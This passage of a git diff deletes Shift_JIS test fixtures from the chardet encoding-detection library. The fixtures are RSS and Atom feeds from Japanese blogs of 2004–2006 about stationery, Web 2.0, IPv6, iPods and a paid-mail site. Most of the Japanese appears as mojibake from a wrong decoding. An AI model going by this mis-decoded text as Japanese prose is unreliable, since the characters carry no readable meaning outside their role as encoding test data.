‚¢‚¿‚¨‚₪A‚±‚ך‚ֵ“–‰‚ּ–“I‚נ’B¬‚ֵ‚«‚½A‚ֶv‚ֱ‚½‚חA‚»‚ּƒJƒ‹ƒeƒBƒG’¼‰c“X‚ּ—׳‚ֹ‚ֽA‚ָ‚÷‚©ƒ‚ƒ“ƒuƒ‰ƒ“’¼‰c“XB’†‚ֵ“Xˆץ‚³‚ס‚ֹAƒ{ƒ‹ƒh[‚ּƒCƒ“ƒN‚ ‚ט‚‚·‚©H‚ֶ•·‚¢‚½‚חA‚ ‚יA‚ֶ‚ּ‚±‚ֶB ‘‘¬‚µ‘‚«‚³‚¹‚ִ‚א‚ח‚₪‚ֶA“–‘R‚ָ‚ׂחAo‚µ‚ִ‚­‚ך‚½‚ּ‚ֽAƒ‚ƒ“ƒuƒ‰ƒ“‚ּ–”N•MB‘‚«–¡‚¢‚¢‚ֱ‚·B‚ֵ‚אAƒyƒ“ז‘¾‚Aו²‘¾‚‚ֵ‚ ‚‚טD‚‚ֵ‚ֽ‚ָ‚¢B ‚ֵAּS‚ּƒCƒ“ƒN‚ּF‚ֽA‚ֶ‚¢‚₪‚ֶAƒ‚ƒ“ƒuƒ‰ƒ“‚ּ‘¼‚ּF‚ֶ“¯‚¶‚­Aב±”–‚‚ֶ‚¢‚₪‚ּ‚׈ףB‚±‚ך‚א“¯‚¶‚­A‚¨”ƒ‚¢ד‚°B ‚ֶ‚¢‚₪‚±‚ֶ‚ֵAˆך‹C‚ֹAƒ{ƒ‹ƒh[n3F‚»‚כ‚¢‚‚µ‚½B ‘‚«”ה‚׳‚ֽA‚ּƒGƒ“ƒgƒ‚ֹ‚ִB... -Stationery -money -2005-12-18T23:59:22+09:00 - - -‚ָ‚÷‚© -http://andore.com/money/archives/003398.html - ‚±‚ס‚ָ‚א‚ּ‚×ט³‚ֹB... -diary -money -2005-12-18T23:04:04+09:00 - - -Web2.0‚ֱ‚ִ‰½‚¾‚ֱ‚¯H -http://andore.com/money/archives/003394.html -ֵ‹AWeb2.0‰ס‚ט‚ּ˜b‘ט‚ֶׂ‚ֱ‚ִ‚אˆ”­B ‚¸‚־‚ט‚ָ–¼‘O‚ּ‰ן׀‚א‚ֵ‚«‚½‚‚½‚¢‚¾‚µA‚¢‚כ‚ס‚ָ“®‚«‚א‚ ‚יB ‚ֵ‚אA‚ָ‚ס‚©‚א‚ֶ‚א‚ֶ‚ּ˜b‚ֶ‚¸‚ך‚ִ‚«‚ִ‚י‚ז‚₪‚ָ‹C‚א‚·‚יB ‚א‚ֶ‚א‚ֶ‚ֽAƒeƒBƒ€Eƒo[ƒi[ƒYEƒ[‹¨‚×’ס¥‚µ‚½AƒZƒ}ƒ“ƒeƒBƒbƒNWeb‚ּ‚±‚ֶ‚¾‚ֶv‚ֱ‚ִ‚½‚ס‚¾‚×A‚ָ‚ס‚©ֵ‹‚ּ˜_’²‚¾‚ֶWebƒT[ƒrƒX‚ֶ‚ּˆב‚¢‚ׂז‚­‚ם‚©‚ח‚ָ‚¢‚ז‚₪‚ָA‚»‚ס‚ָ´‚¶B ‚¿‚ב‚ס‚ֶA’²‚׳‚ָ‚«‚בB... -software -money -2005-12-16T11:57:11+09:00 - - -IPv6“`אA‚±‚±‚ֹB -http://andore.com/money/archives/003393.html -IPv6style:KAME ƒvƒƒWƒFƒNƒg‚ּ—נj‚ֶ¬‰ ` via –³ˆף‹gאV ‚¨‚א‚µ‚כ‚¢I ‚÷‚׀‚ֶ‚אAƒvƒƒWƒFƒNƒgX(‚ A‚א‚₪I‚ם‚ט‚ג‚ס‚©)A‚א‚µ‚­‚ֽA‚ ‚ּƒR[ƒhƒ‰ƒbƒVƒ… ‚ּ‘ז2’e‚ֶ‚µ‚ִ¥”סAƒhƒLƒ…ƒƒ“ƒ^ƒ[‰»‚µ‚ִ‚‚µ‚¢‚ָ‚B@‘ד‚ּƒvƒƒOƒ‰ƒ}‚ּ‚½‚‚ֹ‚אAמ•ס‰»׀‰ן(‚­‚³‚ֱj‚נx‚¦‚יםm‚½‚¿‚נּ‚¦‚י”װ‘g‚ׂ‚µ‚¢B ƒ\ƒtƒgƒEƒFƒA‚ּJ”­‚ׂ¢‚ֶ‚אָ’P‚ֹl‚³‚¦‘ו—‚ֹ““‚·‚ך‚־‚ֵ‚«‚י‚ז‚₪‚ָ•—’ׂנ‚׀‚ֱ‚­‚ט•װ‚·‚ז‚₪‚ָ‚א‚ּ‚נB ‚¨‚¶‚³‚ס‚½‚¿‚×ּ‚נ‰ש‚©‚µ‚”װ‘g‚א‚¢‚¢‚¯‚ַA¡»ך‚ֵ»ְ‚ֹ‹N‚±‚ֱ‚ִ‚¢‚יƒhƒ‰ƒ}‚נ“`‚¦‚י“w—ֽ‚נ‚µ‚ִ‚א‚¢‚¢‚ס‚¶‚ב‚ָ‚¢‚©‚ֶB„@–^‘‰c•ת‘—B... -software -money -2005-12-14T23:30:53+09:00 - - -Skype -http://andore.com/money/archives/003370.html -‚ֱ‚ִA¡A’†‘‚ֵ‘ו—¬s‚ָ‚ּ‚©‚µ‚חH ֵ‹A‚¢‚«‚ָ‚ט˜b‚µ‚©‚¯‚ִ‚­‚י’†‘l‚ֶׂ‚ִ‚א‘½‚¢B‚½‚¢‚ִ‚¢‚ֽA“ת–{ך•׳‹­‚µ‚ִ‚‚·‚ֶ‚¢‚₪ƒpƒ^[ƒ“B ‚ָ‚ּ‚ֵA’†‘ך‚ֵ‰ן˜b‚·‚י‚±‚ֶ‚ֽ‚ָ‚­‚ִA“ת–{ך‚ֶ‰pך‚ֵƒRƒ~ƒ…ƒjƒP[ƒVƒ‡ƒ“‚ֽז‚ך‚י‚ּ‚ֵA“ֱ‚ֹ–ג‘ט‚ֽ‚ָ‚¢‚ּ‚¾‚×B ֵˆ«‚ֽAƒCƒ“ƒtƒHƒV[ƒN‚ּ“ת’†–|–ף‚נg‚¦‚־A‚ָ‚ס‚ֶ‚©‚ָ‚יB... -software -money -2005-11-26T13:18:18+09:00 - - -‹¯‘ֲ‚ֲ -http://andore.com/money/archives/003348.html -Yahoo!ƒjƒ…[ƒX - “ַ”„V•· - o‰cwׂƒhƒ‰ƒbƒJ[‚×€‹c¢E‚ּי‹ֶo‰cׂ‚ֹ‰e‹¿ ‚׀‚ֶ‚ֲ‚ּ‘ד‚×I‚ם‚ֱ‚½A‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚µ‚ו‚₪‚©B ‚»‚ך‚ֹ‚µ‚ִ‚א˜V‚ֵ–S‚­‚ָ‚י’¼‘O‚‚ֵ»–נ‚ֶ‚ֽ‹°‚כ‚µ‚¢B... -diary -money -2005-11-12T22:27:59+09:00 - - -צ®ƒ}ƒCƒ“ƒhƒ}ƒbƒv–{ -http://andore.com/money/archives/003341.html -ƒUEƒ}ƒCƒ“ƒhƒ}ƒbƒvƒgƒj[EƒuƒUƒ“ _“c ¹“T ƒoƒ[EƒuƒUƒ“ ƒ_ƒCƒ„ƒ‚ƒ“ƒh׀ 2005-11-03”„‚טד‚°ƒ‰ƒ“ƒLƒ“ƒO : Amazon‚ֵ‚µ‚­©‚י by G-Tools lˆִׂƒuƒTƒ“‚ֹ‚ז‚יצ®‰נא–{‚נ”­©B ‘O‚ֹo‚½, ‹L‰¯—ֽE”­‘z—ֽ‚׋ֱ‚­‚‚ַ‚‚‚יƒ}ƒCƒ“ƒhƒ}ƒbƒvEƒm[ƒgpƒEƒBƒƒAƒ€Eƒ[ƒh ‚ֶ“¯—lA‘O•ׂƒJƒ‰[ˆף‚ֵA‚÷‚¢‚½‚­‚ָ‘•’‚ֵ‚·B ‚ֶ‚ט‚ ‚¦‚¸A1‚א‚ֱ‚ֶ‚©‚ס‚ֶA‚ֶv‚¢‚°‚ֱ‚ֶB... -book -money -2005-11-08T07:12:15+09:00 - - -‚ָ‚ס‚ֶ‚©‚ֶƒnƒTƒ~‚ֽ..... -http://andore.com/money/archives/003302.html -“ׂנg‚ֱ‚ִ’T‚¹bˆ«‘װ‚ּƒvƒƒOƒ‰ƒ} ץƒeƒNƒjƒbƒN‚נg‚ֹ’…‚¯‚י‚±‚ֶˆָד‚ֹd—v‚ָ‚±‚ֶ‚ֽA–ג‘ט‚נ‰נˆ‚·‚י‚½‚‚ּ“´@—ֽ‚נg‚ֹ’…‚¯‚י‚±‚ֶ‚ֵ‚ֽ‚ָ‚¢‚¾‚כ‚₪‚©B ‚±‚ּƒGƒ“ƒgƒ‚נ“ַ‚ס‚ֵAּƒiƒƒbƒWƒ}ƒlƒWƒƒ“ƒgƒVƒXƒeƒ€‚נJ”­‚µ‚ִ‚¢‚י—Fl‚ּ¾—t‚נv‚¢o‚µ‚½B ug‚¦‚סƒ„ƒc‚ֹA‚₪‚סח–‰~‚א‚·‚יƒiƒƒbƒWƒ}ƒlƒWƒƒ“ƒgƒVƒXƒeƒ€‚נ—^‚¦‚י‚ז‚ט‚אAg‚¦‚יƒ„ƒc‚ֹAGoogle‚ּURL‚נ‹³‚¦‚½•‚×–נ‚ֹ—§‚ֲBv Google‚ֽ¢E’†‚ּמ•ס‚נ\‘¢‰»‚·‚י‚±‚ֶ‚נg–½‚ֶ‚µ‚ִ‚¢‚יA‚ֶצ¾‚µ‚ִ‚¢‚יB‚»‚±‚ֽA’m¯‚ּ•ףֹ‚ֵ‚ ‚טA•ף‚ּR‚ֵ‚ ‚י‚±‚ֶ‚ֽװˆב‚¢‚ָ‚¢B‚ֵ‚אA‚»‚ּ•ף‚ּR‚ֽA–l‚ֹ‹₪’‚ּ•ף‚ּR‚ֵ‚ֽˆ‚µ‚ִ‚ָ‚­A‚»‚ך‚נg‚¢‚±‚ָ‚¹‚י‚©‚ַ‚₪‚©‚ֽAg‚₪‘₪‚ֹ‚©‚©‚ֱ‚ִ‚¢‚יB@ uƒRƒ“ƒsƒ…[ƒ^A‰½‚א‚µ‚ָ‚¯‚ך‚־‚½‚¾‚ּ” v‚ֶ‚ּֽ‚©‚ח‚ז‚­¾‚ֱ‚½‚א‚ּ‚¾‚×A‚¢‚­‚חCPU‚ב¬‚­‚ָ‚ֱ‚ִg‚¢‚ג‚·‚­‚ָ‚כ‚₪‚ֶA‚¢‚­‚ח•ײ—˜‚ֵ«‚­‚ָ‚כ‚₪‚ֶAg‚₪‘₪‚×ֿ‹ֹ“I‚ֹƒRƒ~ƒbƒg‚µ‚ָ‚¯‚ך‚־A–נ‚ֹ‚ֽ—§‚ֱ‚ִ‚­‚ך‚ָ‚¢A‚ֶ‚¢‚₪‚±‚ֶ‚ָ‚ס‚¾‚ֶv‚₪B IT‚ֹ‚ז‚י’m“I¶Y«‚ּד‚ֶ‚¢‚₪‚ּ‚ֽ‚ז‚­ƒrƒWƒlƒX‘‚ּƒe[ƒ}‚ֹ‚א‚ָ‚ֱ‚ִ‚¨‚טAI‚ם‚ט‚ּ‚ָ‚¢‰i‰“‚ּ‰‘ט‚ּ‚ז‚₪‚ֵ‚א‚ ‚י‚¯‚ך‚ַA‚±‚ך‚ֽ’N‚ֹ‚ֵ‚א—Lר‚ֶ‚¢‚₪‚ם‚¯‚ֵ‚ֽ‚ָ‚¢A‚ֶ‚¢‚₪‚±‚ֶ‚×A‹‹ַA‚ַ‚±‚ּo“T‚¾‚ֱ‚½‚©¸”O‚µ‚½‚¯‚ַ(R`‚³‚ס‚ּƒNƒ‹[ƒOƒ}ƒ“˜_•¶‚¾‚ֱ‚½‚©‚ָ?)A‹‹ַITg‚ֱ‚ִ‚אƒzƒƒCƒgƒJƒ‰[‚ּ¶Y«‚ֽד‚µ‚ִ‚ָ‚©‚ֱ‚½A‚ֱ‚ִ‚±‚ֶ‚ֹ‚ָ‚י‚ס‚¶‚ב‚ָ‚¢‚¾‚כ‚₪‚©B‚¾‚©‚ח‚ֱ‚ִIT‚×–נ‚ֹ‚½‚½‚ָ‚¢A‚ֱ‚ִ‚±‚ֶ‚ֵ‚ֽ‚ָ‚­‚ֱ‚ִAƒ}ƒX‚ֵ©‚י‚ֶד‚µ‚ִ‚ָ‚¢‚©‚א‚µ‚ך‚ָ‚¢‚×Aְ‚ֽƒ~ƒNƒ‚ֵ©‚י‚ֶˆב‚ֱ‚ִ‚ִAד‚·‚יl‚ֶA‚µ‚ָ‚¢l(‚ ‚י‚¢‚ֽ’ב‰÷‚·‚יl)‚ׂ¢‚ִA‚»‚ּi·‚ֽ‚‚·‚‚·g‘ו‚ּ•‚ֹ‚©‚ֱ‚ִ‚¢‚יA‚ֶ‚¢‚₪‚±‚ֶ‚ֹ‚ָ‚י‚ּ‚©B‚ֲ‚‚טA‚±‚ך‚׃fƒWƒ^ƒ‹ƒfƒoƒCƒh‚ֵ‚ ‚יA‚ֶB’P‚ֹƒCƒ“ƒ^[ƒlƒbƒgƒ[ƒ`ƒƒƒuƒ‹‚ֵ‚ ‚י‚©”‚©‚׃fƒWƒ^ƒ‹ƒfƒoƒCƒh‚נ¶‚o‚·‚ּ‚ֵ‚ֽ‚ָ‚­A‹‹ַ‚ֽA(³‚ּƒgƒ‰ƒbƒNƒoƒbƒNז‚ּƒGƒ“ƒgƒ‚ֵ‚¢‚₪)“´@—ֽ‚ּ‚ז‚₪‚ָ‚א‚ּ‚נ‚ֲ‚©‚½‚ָ‚¢‚©‚ֹ‰‚¬‚ָ‚¢A‚ֶB‚ֱ‚ִ‚±‚ֶ‚ֽ‚ג‚ֱ‚ֿ‚טAIT‚ֵ‚ ‚כ‚₪‚ֶ‚ָ‚©‚כ‚₪‚ֶײW‚ָ‚¢A‚ֶBi‚ ‚ךHj... -general -money -2005-10-19T11:03:27+09:00 - - -iPod‚ּC— -http://andore.com/money/archives/003295.html -ˆָ‘O‚ֹAiPod‚נC—‚ֹo‚µ‚½B ˆש‚‰ן‚ּ‹A‚ט‚¾‚©‚ֹA—‡‚ּ‚‚—‚ֶ‚µ‚½‚ֶ‚«‚ֹA‰t»‚ׄ‚ך‚½‚½‚‚ֵ‚ ‚יB ‘S‚­A‰t»‚×g‚¢•¨‚ֹ‚ָ‚ח‚ָ‚¢‚ּ‚ֵA‘€ל‚א‚ֵ‚«‚ָ‚¢B ‚»‚ך‚ֵAˆָ‘OC—‚נo‚µ‚½‚ּ‚¾‚×A‚»‚ּ‚ֶ‚«‚ֽA–³C—‚ּ•ב”ֽˆֽ‚©‚חO‚ך‚י‚ּ‚ֵAC—‚ֵ‚«‚ָ‚¢‚ֶ‚¢‚ֱ‚ִA‚»‚ּ‚‚ƒƒ^[ƒ“‚³‚ך‚ִ‚«‚½‚א‚ּ‚¾B ‚ָ‚ּ‚ֵA¡‰ס‚ֽA•בתװ‚אI‚ם‚ֱ‚ִ‚י‚±‚ֶ‚א‚ ‚טA—LC—‚ֶ‚¢‚₪‚±‚ֶ‚ֵA\‚µ‚A–{‘ּ‚נ‘—‚ֱ‚½B ‚·‚י‚ֶA‚‚½‚µ‚ִ‚אAC—‘־”ֽˆֽO‚¾‚©‚חAV‚µ‚¢‚ּ‚נ”ƒ‚ֱ‚ִ‚ֻA‚ֶ‚¢‚₪‚±‚ֶ‚ֵC—‚³‚ך‚¸‚ֹ‹A‚ֱ‚ִ‚«‚½B nano‚©video‚נ”ƒ‚¦‚ֱ‚ִ‚±‚ֶ‚©Bƒp[ƒ\ƒiƒ‰ƒCƒY‚µ‚½‚א‚ּ‚ָ‚ּ‚ֵAז‘ײ‚¦‚ֵ‚«‚ָ‚¢‚ס‚¾‚¯‚ַ‚ָ‚BBB... -diary -money -2005-10-15T20:59:03+09:00 - - -ƒ~ƒjEG -http://andore.com/money/archives/003290.html -‚¢‚ֲ‚א“ַ‚ס‚ֵ‚¢‚יusa cafe‚³‚ס‚ּƒGƒ“ƒgƒ‚ֹo‚ִ‚½Aƒ~ƒjEGA‚¢‚גALAPITA 11†B‹}‚¢‚ֵ‘“X‚ײ‘–‚טA•l‚µ‚ִ‚«‚‚µ‚½B–”N•M‚»‚ּ‚א‚ּ‚נg‚₪‹@‰ן‚ֽF–³‚ֶ‚¢‚₪‚©A–”N•M‚×g‚¦‚י‹@‰ן‚ׂ ‚‚ט‚ָ‚¢‚ס‚¾‚¯‚ַA‚ָ‚ס‚ֶ‚ָ‚­—~‚µ‚­‚ָ‚ט‚‚µ‚½B... -Stationery -money -2005-10-09T00:20:45+09:00 - - -ƒz[ƒ€ƒXƒ^[”ƒ‚₪‚ָ‚ח¡‚ּ‚₪‚¿I -http://andore.com/money/archives/003288.html -‚¸‚ֱ‚ֶ•i”–‚¾‚ֱ‚½Au‚¨‚₪‚¿‚ֵƒvƒ‰ƒlv‚ּƒz[ƒ€ƒXƒ^[B ¡‚ָ‚חAƒAƒ}ƒ]ƒ“‚ֹֹ‚ ‚י‚‚½‚¢‚ֵ‚·‚ז`Bƒƒ^ƒV‚אv‚ם‚¸u‚‚¿‚ֱ‚ֶ‚ָv‚µ‚¿‚ב‚¢‚‚µ‚½B ‰ֶ’כ—p¯‹ף“‰e‹@uƒz[ƒ€ƒXƒ^[(HOMESTAR)v ƒXƒ^[ƒVƒ‹ƒo[ƒZƒKƒgƒCƒY ”„‚טד‚°ƒ‰ƒ“ƒLƒ“ƒO : 154‚¨‚·‚·‚•½‹ֿ דY—ם‚ֵ‚·`O|O‰ֶ’כ‚ֵ‚א‹Cy‚ֹƒvƒ‰ƒlƒ^ƒƒEƒ€‚נy‚µ‚‚½‚¢‹M•‚ֹ™¯D‚«‚ֽג‘־”ƒ‚¢‚ֵ‚µ‚ו‚₪Amazon‚ֵ‚µ‚­©‚י by G-Tools... -purchase -money -2005-10-07T19:56:51+09:00 - - - - \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/andore.com.xml b/chardet/tests/SHIFT_JIS/andore.com.xml deleted file mode 100644 index 8c8c5df..0000000 --- a/chardet/tests/SHIFT_JIS/andore.com.xml +++ /dev/null @@ -1,172 +0,0 @@ - - - - - -Andore Weblog -http://andore.com/mt/ - -en-us - -2005-08-23T07:46:13+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -‚ֲ‚­‚־‚ּ•׃ -http://andore.com/mt/archives/003223.html - “o ‘ו—V—’}”g‘וwמ•סw—‚ּ SoftEther VPN “ת‹L ְ‚ֹA’}”g‘וw‚נo‚י‚ֶ‚±‚כ‚©‚ח‚s‚w‚ּ‰w‚‚ֵװ‚ֵs‚ֱ‚½‚ֶ‚±‚כ‚ּ‰f‘‚נ‚c‚uƒJƒƒ‰‚ֵB‰e‚µ‚ִƒGƒ“ƒR[ƒh‚µ‚ִ’u‚«‚‚µ‚½B‚²——‚­‚¾‚³‚¢B ‚ָ‚ֲ‚©‚µ[B ‚׀‚³‚ׁ‚³‚ֹ‚ֲ‚­‚־‚ּ•׃‚ש‚ח‚ך‚½B ‚±‚₪‚¢‚₪ƒrƒfƒI‚¢‚¢‚ָ‚B •½’ֻ‚ֹƒpƒ`ƒ“ƒR‰®(ƒpƒ`ƒXƒ‰®)‚ב‚¦‚½‚ֻB... - -Hiro -2005-08-23T07:46:13+09:00 - - -‚½‚µ‚©‚ֹ־‚¢~‚‚ח‚ָ‚¢B -http://andore.com/mt/archives/003192.html - ‰‚¢ƒuƒƒO:־‚¢‚ּ~‚‚ח‚ָ‚¢ƒRƒsƒy ־‚¢‚ּ~‚‚ח‚ָ‚¢ƒRƒsƒy ƒiƒCƒX!... - -Hiro -2005-07-27T05:56:22+09:00 - - -ƒXƒ^[ƒEƒH[ƒYD‚«‚ֹBBB -http://andore.com/mt/archives/003146.html -http://www.treehouseanimation.com/rotb/index_film.html... - -money -2005-07-04T02:59:01+09:00 - - -ƒAƒJƒyƒ‰‚ֵ... -http://andore.com/mt/archives/002986.html -nintendo themes, a cappella (a choir performance of classic nintendo songs) - video nintendo themes ƒuƒ‰ƒ{[B... - -Hiro -2005-04-13T06:17:06+09:00 - - -“§–¾PSP -http://andore.com/mt/archives/002960.html -DSC07368 on Flickr - Photo Sharing! DSC07368 ƒAƒƒƒJ‚ֵ”­”„‚³‚ך‚י‚ג‚¢‚ָ‚ג‚±‚ס‚ָ•—‚ֹg‚ם‚ך‚י‚ֶ‚ֽ...B... - -Hiro -2005-03-28T02:31:43+09:00 - - -“§–¾ƒfƒXƒNƒgƒbƒv -http://andore.com/mt/archives/002956.html -Transparent Screens - a photoset on Flickr Transparent Screens ‚ AƒfƒXƒNƒgƒbƒv‚ד§–¾‚ֹ.... ‚‚¦‚יƒgƒƒbƒNƒA[ƒg‚ּˆךםB@ ƒoƒJ‚¨‚א‚µ‚כ‚¢B... - -Hiro -2005-03-25T03:52:03+09:00 - - -Break Dance & Dance -http://andore.com/mt/archives/002857.html - ">http://freakazoid.superprovider.de/media_1.html http://www.detoursvideo.com/Slurpee_Elsewhere.mov http://www.ne-o.co.uk/latenite.mpg http://www.thedirectorsbureau.com/vault/rcoppola/mvid/FatBoySlim_Praise400.mov http://www.astralwerks.com/fbs/woc/... - -kaz -2005-02-04T02:21:54+09:00 - - -VW Video -http://andore.com/mt/archives/002852.html -¡http://image.guardian.co.uk/sys-video/Media/video/2005/01/27/golfgti.mov ¡Car for most occasions - Bore Me: the best of your inbox... - -andore -2005-02-01T13:38:00+09:00 - - -—¼•‘ו·‚ט! -http://andore.com/mt/archives/002845.html --OwH“°ִ“ק’טH - -[—¿] -“״ƒoƒ‰ 400g -¶›I “K“– -‚µ‚¨,ƒRƒVƒ‡ƒE - -Hiro -2005-01-31T15:10:00+09:00 - - -ƒ}ƒCƒ„ƒq[! -http://andore.com/mt/archives/002820.html -ƒ}ƒCƒ„ƒq[ ‚׀‚³‚ׁ‚³‚ּƒqƒbƒgB ¢E’†‚ֵ‘ו—¬s‚ח‚µ‚¢B ‚µ‚­‚ֽ‚±‚¿‚חƒ}ƒCƒ„ƒq[ ‚‚ֶ‚... - -Hiro -2005-01-24T16:22:30+09:00 - - -‚ָ‚¨‚׃‚‚­‚ס -http://andore.com/mt/archives/002644.html -¡“תA˜Z–{–״ƒqƒ‹ƒY‚ֹSFC‚ּƒCƒxƒ“ƒg©•¨‚ֹs‚ֱ‚½‚ח1‚±‰÷‚ּw”N‚¾‚ֱ‚½‚ָ‚¨‚׃‚‚­‚ס‚ֹ‘˜‹צ‚µ‚‚µ‚½BSFC‚ּut‚ָ‚ּ‚ֻ[B‚³‚ס‚´‚ס˜b‚נ•·‚¢‚½ד‚ֵAu‚ ‚ּ~‚ַ‚±‚©‚ֵ‚¨‰ן‚¢‚µ‚ִ‚‚·‚ז‚ֻ~v‚ִ‚ָ‚©‚ס‚¶‚ֵB –¾“ת(11/24)‚אƒCƒxƒ“ƒg‚ג‚ֱ‚ִ‚י‚ּ‚ֵ‰ן‚¢‚½‚¢•‚ֽ‚ַ‚₪‚¼BBB http://orf.sfc.keio.ac.jp/index.html... - -andore -2004-11-24T00:39:46+09:00 - - -Uno, dos, tres, catorse! -http://andore.com/mt/archives/002637.html -iPod ‚ּ CM ‚ֵּ‰B ‰½‚ִƒJƒEƒ“ƒg‚µ‚ִ‚י‚©‚ֶv‚ֱ‚½‚ח 1, 2, 3, 14! ‚ָ‚÷ 14?... - -Hiro -2004-11-22T03:13:38+09:00 - - -‘ו‚¿‚ב‚ס -http://andore.com/mt/archives/002534.html -‚±‚ָ‚¢‚¾ƒƒ{₪BBQs‚ֱ‚½‚חRט‚³‚ס‚בf“G‚ָ‰‚³‚ס˜A‚ך‚ִ‚«‚ִ‚‚µ‚½B ui–l‚ֽjƒrƒWƒlƒXםm‚¾‚ז`v ‚¾‚ֱ‚ִB ‚ֵ‚א•‘•‚ּ‚¹‚¢‚©Aƒpƒb‚ֶ©‚ֽ‘וw‰@¶B... - -hide -2004-10-24T01:25:53+09:00 - - -‚ָ‚ס‚ֵ‰® -http://andore.com/mt/archives/001545.html -¡“ת‰w‘O‚ּ‹גs‘O‚ֵu‚ָ‚ס‚ֵ‰®v‚ֶ‚¢‚₪‚¨“X‚נ‚ג‚ֱ‚ִ‚¢‚יl‚ׂ¢‚‚µ‚½B ƒSƒU‚ּד‚ֹu‚ָ‚ס‚ֵ„‚ֹ”‚ֵׂ‚«‚ָ‚¢‚ּHv‚ֶ‚©u‚ָ‚ס‚ֵlװ‚ֽם‘ˆ‚·‚י‚ּHv‚ָ‚ַ‘‚©‚ך‚½ƒJ[ƒh‚וְ‚ס‚ֵ‚¢‚ִA20-30‘דmut•—‚ָ’j‚ּl‚׀‚ֶ‚טB‚ֶ•”ֲB ‚¨‹q‚ּu‚ָ‚ס‚ֵHv‚ֹ“‚¦‚ִ‚­‚ך‚י‚ח‚µ‚¢B“‚¦‚ח‚ך‚ָ‚¢‚ֶh‘ט‚ח‚µ‚¢B‹»–¡’ֳXB http://www.rui.jp/ruinet.php3... - -andore -2004-08-21T01:33:29+09:00 - - -uװֵ‘ו•—‘¬ -http://andore.com/mt/archives/001538.html - Blog People ‚ּƒNƒƒbƒNƒ‰ƒ“ƒLƒ“ƒOB ‚ָ‚ס‚ֶ9ˆ‚נ’B¬B ¡“ת‚א20ˆ‚ֹƒ‰ƒ“ƒNƒCƒ“B ‚ֵ‚אA‚ָ‚ס‚ֵ‚¾‚כ‚₪? ©•ֵׂ‚א‚ם‚©‚ח‚ָ‚¢B... - -Hiro -2004-08-18T06:26:31+09:00 - - - - \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/blog.inkase.net.xml b/chardet/tests/SHIFT_JIS/blog.inkase.net.xml deleted file mode 100644 index b5503af..0000000 --- a/chardet/tests/SHIFT_JIS/blog.inkase.net.xml +++ /dev/null @@ -1,603 +0,0 @@ - - - - ƒCƒ“‰ׂIBLOG - - - tag:blog.inkase.net,2006://1 - - 2006-01-03T08:11:55Z - uƒCƒ“ƒ^[ƒlƒbƒg‚ֵ¬­‚¢‰ׂ‚¬Ivַ—l‚ּA“ֶ‚ט¾BLOGB -ƒIƒXƒXƒƒTƒCƒg‚ג‹‹µ•ס‚אA‹C‚‚••s’טת‚ֹXV‚µ‚‚·B - Movable Type 3.2-ja-2 - - - BLOG‚×cII - - - tag:blog.inkase.net,2006://1.23 - - 2009-12-31T15:00:00Z - 2006-01-03T08:11:55Z - - ‚¿‚ו‚ֱ‚ֶƒfƒtƒH‚ֹ–‚ט‚‚µ‚½BB MovableType‚נMySQL‚©‚חSQLit... - - Gen - http://blog.inkase.net/ - - - - - ƒSƒƒSƒƒ[ƒ‹ײ˜A‚ֵ—ˆ‚ִ’¸‚¢‚½•‚ֽA -@ƒSƒƒSƒƒ[ƒ‹(VESAKURA Mail)‚‚ֶ‚‹L–‚נ‚²——‚­‚¾‚³‚¢B - -05”N‚ּ‹L– -12ƒA[ƒJƒCƒu^11ƒA[ƒJƒCƒu^10ƒA[ƒJƒCƒu^09ƒA[ƒJƒCƒu^ -08ƒA[ƒJƒCƒu^07ƒA[ƒJƒCƒu^06ƒA[ƒJƒCƒu^05ƒA[ƒJƒCƒu^ -04ƒA[ƒJƒCƒu^03ƒA[ƒJƒCƒu^02ƒA[ƒJƒCƒu^01ƒA[ƒJƒCƒu]]> - - - - - ƒSƒƒSƒƒ[ƒ‹(VESAKURA Mail)‚‚ֶ‚‹L– - - - tag:blog.inkase.net,2006://1.31 - - 2006-01-03T07:45:06Z - 2006-01-03T08:22:27Z - - BLOG‚וֿ‚ֹ‚ָ‚ֱ‚½‚ּ‚ֵז‚ט‹}‚¬‘‚«‚‚µ‚½U(PP;)ƒ’ƒCƒ’ƒC ƒSƒƒSƒƒ[ƒ‹... - - Gen - http://blog.inkase.net/ - - - - - Good Friend Mail•ֲ½I -@05/12/11@asinnuSAVE MONEYv‚ּ³‘ּ‚ֽcHI -@05/12/17@SAVE MONEY¨ƒAƒoƒ^[”ƒז–{•¨‚‚½•ֲ½HI -@05/12/24@V’…uƒSƒƒSƒƒ[ƒ‹v‚א‚א‚µ‚©‚µ‚ִc -@05/12/26@ƒSƒƒSƒƒ[ƒ‹uHTML 404–¢ov -@05/12/28@ƒSƒƒSƒƒ[ƒ‹‚ֽpaidmail-lifen—סHH -@05/12/30@paidmail-lifeַ—l‚³‚ס‚ֶ˜b‚µ‚‚µ‚½B - -–ƒuƒƒO•‹ל‹ֶ‚ּדˆגַ‚ֵAֲX‚ּ‹L–‚ײ‚ּƒRƒƒ“ƒg‚גƒgƒ‰ƒbƒNƒoƒbƒN‚ֽo—ˆ‚‚¹‚סB -@ƒSƒƒSƒƒ[ƒ‹ײ˜A‚ּƒRƒƒ“ƒg¥ƒgƒ‰ƒbƒNƒoƒbƒN‚ֽ‘S‚ִ‚±‚ּ‹L–‚ײ‚¨ט‚¢‚¢‚½‚µ‚‚·B -@‚¨ט”‚נ‚¨‚©‚¯‚µ‚‚·‚×A‚ז‚כ‚µ‚­‚¨ט‚¢‚¢‚½‚µ‚‚·B - -ƒSƒƒSƒƒ[ƒ‹ױ’n‚ֵ‚ֽA**PAIDMAIL LIFE**ַ—l‚³‚ס‚ּט‚ֹ‚ז‚ֱ‚ִ -VƒTƒCƒguSAKURA MailvƒI[ƒvƒ“‚ֹ‚¯‚ִ€”ץ‚×i‚‚ח‚ך‚ִ‚¢‚‚·B]]> - „‚×ַ—l‚³‚ס‚ֹ‘—‚ֱ‚½ƒ[ƒ‹@”²ˆ -„‚ּVƒTƒCƒg‚ײ‚ּף–]‚נ˜b‚µ‚‚·B
    -VƒTƒCƒg‚ֽ100‰~·‹א‚ֵ4’iKˆָד‚ּ׀‰מ•סV‚ׂ¢‚¢‚©‚ֶv‚¢‚‚·B
    -¡‰ס‚ּƒSƒƒSƒ‚אu100‰~·‹אv‚ֶ‚¢‚₪¾—t‚ֵ‹\“o˜^ׂ‚ב‚¦‚½‚ֶv‚¢‚‚·B
